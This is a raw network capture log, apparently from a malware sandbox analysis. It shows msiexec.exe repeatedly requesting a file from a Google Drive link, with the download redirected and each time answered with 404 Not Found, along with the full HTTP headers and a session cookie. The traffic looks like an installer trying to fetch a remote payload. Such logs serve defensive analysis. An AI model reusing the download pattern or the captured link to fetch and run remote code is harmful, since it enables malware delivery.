                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:17:55 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                                          Content-Type: application/binary
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:17:55 GMT
                                                                                          Location: https://drive.usercontent.google.com/download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download
                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Content-Security-Policy: script-src 'nonce-p_r5KBXCk81rxnaIdYnLTw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Server: ESF
                                                                                          Content-Length: 0
                                                                                          X-XSS-Protection: 0
                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Connection: close


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          49 | 192.168.2.6 | 50034 | 216.58.206.65 | 443 | 5692 | C:\Windows\SysWOW64\msiexec.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          2025-01-10 14:17:55 UTC | 460 | OUT | GET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Cache-Control: no-cache
                                                                                          Host: drive.usercontent.google.com
                                                                                          Connection: Keep-Alive
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:17:56 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                                                          X-GUploader-UploadID: AFIdbgRiznYI3J0EdjZatKLEDqleogOrRsw2whgfx1Sbeeg47UMHataN5de9ix8sImtnHftMSxlpF38
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:17:56 GMT
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Content-Security-Policy: script-src 'nonce-m6lHwX_tYE6fi_6jU4ZnQg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Content-Length: 1652
                                                                                          Server: UploadServer
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                                          Connection: close
                                                                                          2025-01-10 14:17:56 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Sz_cGnYbBzNxCqTg8JCL9w">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          50 | 192.168.2.6 | 50035 | 142.250.185.110 | 443 | 5692 | C:\Windows\SysWOW64\msiexec.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          2025-01-10 14:17:57 UTC | 418 | OUT | GET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Host: drive.google.com
                                                                                          Cache-Control: no-cache
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:17:58 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                                          Content-Type: application/binary
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:17:58 GMT
                                                                                          Location: https://drive.usercontent.google.com/download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download
                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy: script-src 'nonce-jOOI8sqjTYWPRTlGn6jkAw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Server: ESF
                                                                                          Content-Length: 0
                                                                                          X-XSS-Protection: 0
                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Connection: close


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          51 | 192.168.2.6 | 50036 | 216.58.206.65 | 443 | 5692 | C:\Windows\SysWOW64\msiexec.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          2025-01-10 14:17:58 UTC | 460 | OUT | GET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Cache-Control: no-cache
                                                                                          Host: drive.usercontent.google.com
                                                                                          Connection: Keep-Alive
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:17:59 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                                                          X-GUploader-UploadID: AFiumC78cnMeQxiMtzLvvwcOEyCmkpcHSuTOQ0Yzi0ICQeb3je7LyHoGDNGkanFujjf8jpl8
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:17:59 GMT
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy: script-src 'nonce-HND_VF4-F29QqCe7GGAXcw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Content-Length: 1652
                                                                                          Server: UploadServer
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                                          Connection: close
                                                                                          2025-01-10 14:17:59 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="a1ynkF291U7tWf5HVMJXHw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          52 | 192.168.2.6 | 50037 | 142.250.185.110 | 443 | 5692 | C:\Windows\SysWOW64\msiexec.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          2025-01-10 14:18:00 UTC | 418 | OUT | GET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Host: drive.google.com
                                                                                          Cache-Control: no-cache
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:18:00 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                                          Content-Type: application/binary
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:18:00 GMT
                                                                                          Location: https://drive.usercontent.google.com/download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download
                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy: script-src 'nonce-oCaEZO-jPyx1LIQRbmW-Pg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Server: ESF
                                                                                          Content-Length: 0
                                                                                          X-XSS-Protection: 0
                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Connection: close


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          53 | 192.168.2.6 | 50038 | 216.58.206.65 | 443 | 5692 | C:\Windows\SysWOW64\msiexec.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          2025-01-10 14:18:01 UTC | 460 | OUT | GET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Cache-Control: no-cache
                                                                                          Host: drive.usercontent.google.com
                                                                                          Connection: Keep-Alive
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:18:01 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                                                          X-GUploader-UploadID: AFIdbgQ2HLa2190ZiZF4HPMOF_phK788LVxKslIJhZJyMBmfF_xzlD5t-5bLrXnnYkHHbx7oarZtZ94
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:18:01 GMT
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy: script-src 'nonce-Iw71Zet5zzOQK6DBVd-_sA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Content-Length: 1652
                                                                                          Server: UploadServer
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                                          Connection: close
                                                                                          2025-01-10 14:18:01 UTC | 1652 | IN
                                                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="vfmsBkAB18DgDJh3pU6zIQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          54 | 192.168.2.6 | 50039 | 142.250.185.110 | 443 | 5692 | C:\Windows\SysWOW64\msiexec.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          2025-01-10 14:18:02 UTC | 418 | OUT | GET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Host: drive.google.com
                                                                                          Cache-Control: no-cache
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:18:02 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                                          Content-Type: application/binary
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:18:02 GMT
                                                                                          Location: https://drive.usercontent.google.com/download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download
                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                          Content-Security-Policy: script-src 'nonce-56Y6xNoBMuYqQHnt-vea6w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Server: ESF
                                                                                          Content-Length: 0
                                                                                          X-XSS-Protection: 0
                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Connection: close


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          55 | 192.168.2.6 | 50040 | 216.58.206.65 | 443 | 5692 | C:\Windows\SysWOW64\msiexec.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          2025-01-10 14:18:03 UTC | 460 | OUT | GET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Cache-Control: no-cache
                                                                                          Host: drive.usercontent.google.com
                                                                                          Connection: Keep-Alive
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:18:03 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                                                          X-GUploader-UploadID: AFIdbgSEFUWaPc9uywwePz5zQv6LjAim6hYxryeqx4brrKSOqLKXjxaLerDh18_9TNULyDkk
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:18:03 GMT
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Content-Security-Policy: script-src 'nonce-aYMjxTNIfvEa2DPB02-zDw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Content-Length: 1652
                                                                                          Server: UploadServer
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                                          Connection: close
                                                                                          2025-01-10 14:18:03 UTC | 1652 | IN
                                                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="9AqXnB47J7YqeWMFuZOkxQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          56 | 192.168.2.6 | 50041 | 142.250.185.110 | 443 | 5692 | C:\Windows\SysWOW64\msiexec.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          2025-01-10 14:18:04 UTC | 418 | OUT | GET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Host: drive.google.com
                                                                                          Cache-Control: no-cache
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:18:05 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                                          Content-Type: application/binary
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:18:05 GMT
                                                                                          Location: https://drive.usercontent.google.com/download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download
                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy: script-src 'nonce-RbjrLgjkMa5ObxlUSkDjpQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
